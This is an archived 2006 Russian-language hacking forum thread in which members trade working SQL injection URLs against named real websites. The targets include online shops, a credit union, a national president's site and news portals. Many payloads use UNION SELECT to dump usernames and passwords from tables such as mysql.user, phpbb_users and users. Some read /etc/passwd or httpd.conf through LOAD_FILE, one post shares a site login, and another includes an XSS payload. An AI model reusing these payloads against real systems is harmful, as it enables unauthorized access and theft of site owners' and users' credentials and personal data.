SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,concat(user,%22:%22,password),10,11,12,13,14+from+mysql.user/*

    А вот и рут нашелся :)

    http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14+from+mysql.user/*
     
    #61 Goudini, 9 Oct 2006
    Last edited: 9 Oct 2006
    1 person likes this.
  2. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Ну у меня не банк, конечно...но всё же...
    Code:
    _http://www.softinka.net/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
    (Чтобы увидеть действие скуля, надо быть зарегенным на сайте. чтобы вам полдня не копаться с регистрацией: SponSor:hacker)
    /modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
     
    #62 Ch3ck, 10 Oct 2006
    Last edited: 11 Oct 2006
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://www.galicianet.com/foros/default2.asp?IDMensaje=1 or 1=(select system_user) --
     
    2 people like this.
  4. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    POST: http://shop.shooterscatalog.com/catalog.php?type=category&id=5125 order by 1/*

    Скуль на шопе. ORDER BY не врет, но реализация не из элементарных.
     
  5. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    База в виде
    email
    login:password





    etc/passwd



    Также в окне поиска пассивная xss

    <script>alert()</script>
     
  6. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Скуля в параметре типа STRING из-за недостаточной фильтрации входящих символов + magic_quotes=Off

    http://www.president.bg/news_archive.php?from=news'%20and(1=1)--&type=0
     
  7. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    Code:
    http://motvet.ru/aboutgame.php?IDNew=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(99,58,92,119,119,119,92,99,111,110,102,92,104,116,116,112,100,46,99,111,110,102)),8,9,10/*
    // показывает httpd.conf
    
    _http://www.soccershop.ru/shopping/product_info.php?id=-3016+union+select+1,2,3/*
    _http://www.mtas.ru/second.php?ID=-15+union+select+111/*
    _http://www.transbuddha.com/mediaHolder.php?id=-1147+union+select+1,2,3,4,5,6,7/*
    _http://www.ipecac.com/bio.php?id=-3+union+select+1,2,3,4/*
    _http://www.rusfinclub.ru/index.php?news_id=-1846+union+select+1,2,3,4,5,6,7,8,9/*
    
     
    1 person likes this.
  8. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    _http://www.esparto.co.uk/product.php?id=-454+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
     
  9. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    _http://www.deseretfirstcu.org/m2m/detail.asp?car=1+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+FROM+login
     
  10. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    http://tema.in.ua/article/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    http://newstoday.com.ua/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
     
  11. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Не знаю как у Вас, а у нас одна из самых распространненых станций:
    radiorecord.ru/news/?id=-327%20union%20select%20USER()/*
     
    1 person likes this.
  12. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    рейтинг казино )

    _http://www.casinoratgeber.com/index.php?bid=-3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+
     
    1 person likes this.
  13. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    _http://dosug.nu/blockcomment.htm?idblock=1'+or+'1'='1+order+by+1--
     
  14. corsp_puttrider

    corsp_puttrider New Member

    Joined:
    16 Oct 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Nobody Shells & MySQL inj, пользуемся

    ht_tp://www.formicarium.pl/open.php?p=artykuly&dzial=1&art=-49+union+select+null,CONCAT(username,CHAR(45,62),user_password,CHAR(32,45,62,73,68,61,32),user_id),CONCAT(user_email,CHAR(32,38,32),user_website)+from+phpbb_users/*

    Дырку поправили :-(

    -
    Шеллы запрещены!
    /[m0nzt3r/]
     
    #74 corsp_puttrider, 18 Oct 2006
    Last edited: 19 Oct 2006
  15. corsp_puttrider

    corsp_puttrider New Member

    Joined:
    16 Oct 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Продолжение к Kazanova

    ht~tp://www.kazanova.com.ua/product.php?id=-2+UNION+SELECT+1,2,CONCAT(CHAR(64,64),user,CHAR(58,58),password,CHAR(58,58),name,CHAR(58,58),surname,CHAR(58,58),id,CHAR(58,58),sex,CHAR(58,58),email,CHAR(58,58),phone,CHAR(58,58),city),4,5,5,7,8,9,1,1,1,1,1+from+users/*
    админка по адресу /admin
     
    1 person likes this.
  16. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Весь сайт в багах.
    Кто доламает отпишите в асю.
    Если я 1 не буду :)


    _http://zloy.org/news_f1%20union%20select%201.html

    _http://zloy.org/news_f1'%20union%20select%201,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,9,9,9,1,2,3,4.html
     
  17. corsp_puttrider

    corsp_puttrider New Member

    Joined:
    16 Oct 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Вот еще только не смог подобрать имя базы

    http://www.chicagomediaaction.org/news.php?id=-481%20union%20select%201,2,3,4,5,6,7,8/*
     
  18. corsp_puttrider

    corsp_puttrider New Member

    Joined:
    16 Oct 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Скуль(правда не смог найти имя таблицы)

    http://www.multidmedia.com/news/news.php?id=-63%20union%20select%201,2,3,4,5/*
     
  19. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    loccitane.com Все движки разные но все бажные так держать админы.

    _http://www.loccitane.com.au/product/categoryList.asp?mainUsageName=FRAGRANCE&subUsageId=10%20or%201=@@version--

    _http://www.loccitane.ru/category.php?id=-1+union+select+1,2,concat(login,char(58),password),1,5+from+users+where+id=134/*
     
  20. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    27 столбцов=)
    А вот еще одна на этом же сайте)
    ВОТ еще 2 инекции на сайте

    www.zot.ru


    все колонки которые мне известны и всем доступны:
    id,name,art,typename,descr,acti,cert,spec,status
     
    #80 _Pantera_, 20 Oct 2006
    Last edited by a moderator: 20 Oct 2006
Thread Status:
Not open for further replies.